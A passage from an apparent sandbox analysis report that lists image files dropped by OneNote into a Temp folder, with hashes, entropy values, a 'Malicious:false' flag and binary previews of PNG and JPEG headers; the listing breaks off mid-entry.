                                                                                                                                            SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                            MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                            SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                            SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                            SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{1F4A8171-8221-411F-8694-1A88665F8122}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1873
                                                                                                                                            Entropy (8bit):7.534961703340853
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:N9YMw9kGzE4xTdow1C3kyIkyM66KeJY3fOxJ:/h8HzE4xTdoUCUyxyD6LCvSJ
                                                                                                                                            MD5:4FC8500BD304AD127AF4B5E269DFF59B
                                                                                                                                            SHA1:9A5E3432358A0FCDECE86AEB967319B93A65D14A
                                                                                                                                            SHA-256:B4DAA90D5A53FCBC85119050B5B76962443C4DD18D7F42CDC6D4E0AD8EFAD872
                                                                                                                                            SHA-512:E5E07054A522EB91EFD39722AFB3776389632B8F5F923C1D29796716D68CEC93BE5E44F79913804CEC7ED631FF520CBBBAAB841E01FB90AF8E8ADF84DCD47481
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......`...."........................................>.......................tu.....45.!#$%1s."fr...2Fq..AQe.Eav............................... .........................!AQR.............?..e4.bbu."m.G......u.S.-Qq.b.a..'#..E.......u.|:.f[O..jS.S.&....=.....[.....S...N.~~...'...q....N.T.Oyf..a.6..%.I.1j.e~.4..[5.WW.Y..Xp.gn...u.......Gb.O.W..k.!mJgfq....~.F.......m..}bn4.5........s,F...z.b)..O..*...5).-.-\....=`.fP....%...A..Q.&..9.....QQbD.%.:u.f...r$.10..W.F.T..MI...9...ZQH._..).....D..n.F].........*.:.j...!6Z..S....0...B.6..Ga..S.O.....U8S_.J.>...i..?..<.P..........M..F.T.C..7.E...`.4BKcMh1j....4y...+.|.^......2[.WG.W..+......E..r/V^".R...."..6..hht..f...........;E..Kx....)}Le.A.x.>..$/).._S.n.L......}..H^Sw...2. .v.io...../.........x.>..$/).._S.n.t^;O.....n...[.S...h.v.io...../....:/...[..7yK.c-

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{21AE3113-B881-4386-97D6-A4C4E12F3945}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3879
                                                                                                                                            Entropy (8bit):7.9281351307465044
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                            MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                            SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                            SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                            SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{21FB4D76-7183-4518-BDAB-6F42CF70151D}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):40884
                                                                                                                                            Entropy (8bit):7.545929039957292
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
                                                                                                                                            MD5:7379775A1E2AB7FAB95CFFCE01AE05F3
                                                                                                                                            SHA1:3D3DDFD8AC7E07203561BAE423D66F0806833AB3
                                                                                                                                            SHA-256:9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
                                                                                                                                            SHA-512:4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{227B1C71-6EE3-48ED-B642-14C8BD82481C}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4819
                                                                                                                                            Entropy (8bit):7.874649683222419
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:/hnQiz+ET2/hDi+tv34VtpWfowTHgegb6hhLT1NTS:5nQ6TAhLtvIzMvbi6hhF0
                                                                                                                                            MD5:5D6C1F361BC04403555BE945E28E53FC
                                                                                                                                            SHA1:00C254F7B3BC0289590C2BBDBB39C8EC2E2B2821
                                                                                                                                            SHA-256:131D637CDC5D0B094FB9FAD17F4D2A1ACE0D03613588155AACAA2D1CB4E16DA9
                                                                                                                                            SHA-512:34D2C0929FCC3CC10D0A2121BD55BFA9A07062C2A7B8F101071164C946895DBCB2777641E79DE4193D57A3F0778DD4F1351FAF333B7E4B4DBE31A32DD69C51F9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................<........................!1..AQaq"...2B...#Rb..r..$3CS.cs..................................................!1A............?.............u....p.p($.Y...9,j...V.*..S86yh.G.#m.5..9...6Y.."C.R:.[..-.7U3c:..].;.....f.?%..<T...&F.Lh.N...m]..x.D.g<B.....k..S........>j.K....#U..Z....<e.:..8....o..xq.[..4v..U..y...k... k....A#..A...pn.jJ.I.7:..{.b..ns.t,...8.Td.I....m.I.5Z.).-.. ]..X.Do%.....?..4jV.`llt.E...5...u.|..\F.=.F.r<...5dV....xc.%..&...4,...f...3..H.<......eQ...P.J....7...lLc..?..-.fR..7.#.6.......}:.]'.ny..........e;u.Y..$0...i..-....f..9(....}..T,.Inb...+=Cca7....WULA1@.s...4uY5.N.f.c..].ks.....3v..~..k..m)...f gNE`S......#.....Z..6.uc.m...#k.s.f*.l.$6..?..xC.Cm.`...N2..&H...._.&.E...[....f.Z./...!.a{K..#.V.5..v.B....1...9..B.&....%s.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{229E1CFB-631C-4F66-B91D-78FB43D36BEA}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12824
                                                                                                                                            Entropy (8bit):7.974776104184905
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                                                            MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                                                            SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                                                            SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                                                            SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{24189959-F668-4FF2-BB1B-CE099AD5E5AC}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):70028
                                                                                                                                            Entropy (8bit):7.742089280742944
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:ub4bgbB7g9cKCmSzaNF0jAdAzQKTEFBQqUp/i0yG1pidLHTVX:ub4bIB7Qg2OjbzjgWp/i0yGCZx
                                                                                                                                            MD5:EC7811912ACA47F6AEB912469761D70D
                                                                                                                                            SHA1:C759BC2D908705D599B03BDB366C951B11F99A4E
                                                                                                                                            SHA-256:FBB4573E3BEE1B337077691BEBAE15D6FAC52432405D31396D526D7694A8283D
                                                                                                                                            SHA-512:881828150993A8C56E36CDA2051D89C1F6E0322643902C9506392C163E8734A2933A46486F40E5BC8C8D0164E180605E52620EF22FE14540AEA787A38B22E98E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....7Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:12:29.............................V.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................}.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....H.yM..? .Z.. .^.x..p.8.A...K.... .\{..)..y....t..=.^y)..v.@.W>. .h.. ..p.:.\)(.$....$.I).....!....E..Z.....&.5.).

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{24A48F20-E5AB-4202-90F4-656C01D7DD51}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2210
                                                                                                                                            Entropy (8bit):7.86853667196985
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                            MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                            SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                            SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                            SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{253B1647-46E1-40FE-8A16-C70C9AFFE4F9}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2270
                                                                                                                                            Entropy (8bit):7.845368393313232
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                            MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                            SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                            SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                            SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{25472C9A-EDD4-4313-B3DC-712E7F47CE7A}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8184
                                                                                                                                            Entropy (8bit):7.807848176906598
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                            MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                            SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                            SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                            SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{259CAF0B-1663-44DB-BB77-1A93D2514449}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2270
                                                                                                                                            Entropy (8bit):7.845368393313232
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                            MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                            SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                            SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                            SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{26571D9E-BF92-4C37-9043-1B6B47175F57}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, progressive, precision 8, 1692x810, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):88911
                                                                                                                                            Entropy (8bit):7.701779182597222
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:4a+us0Yfpw9/WFi5HrTy2NtTWR7f2f5RNzQiiiiiiiiiiiiiimL1Vmwwn:4aA0YRw9/WITtTWR7IbNzvL1an
                                                                                                                                            MD5:4D5F7AFD30851031376DA0FA6D0E3F80
                                                                                                                                            SHA1:02154E502F09DDD49FFB8F55D0651FFCD7379B94
                                                                                                                                            SHA-256:F918BB0C65D2F90593265FE4087B9C6905148BD7B46579D902B9ABD5415415F5
                                                                                                                                            SHA-512:ED8BF498C66F59D252DA77CA490B067AF4106F3EA421A024C1C56D2AB63037B0E8BA71961D06370DB76773B08E1BE298C770395DD6CB131F2CE48BDF1D11711B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{26B9C01D-0455-49E6-AE2C-BA9629A0B40A}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):41893
                                                                                                                                            Entropy (8bit):7.52654558351485
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
                                                                                                                                            MD5:F25427EFECFEE786D5A9F630726DD140
                                                                                                                                            SHA1:BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
                                                                                                                                            SHA-256:5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
                                                                                                                                            SHA-512:B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ*.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[F*ly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{26F3D828-63BF-4D72-94DB-557A69DDBBBC}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5386
                                                                                                                                            Entropy (8bit):7.943706538857394
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                            MD5:DB48555480A383CD1D4DD00E2BCFCF29
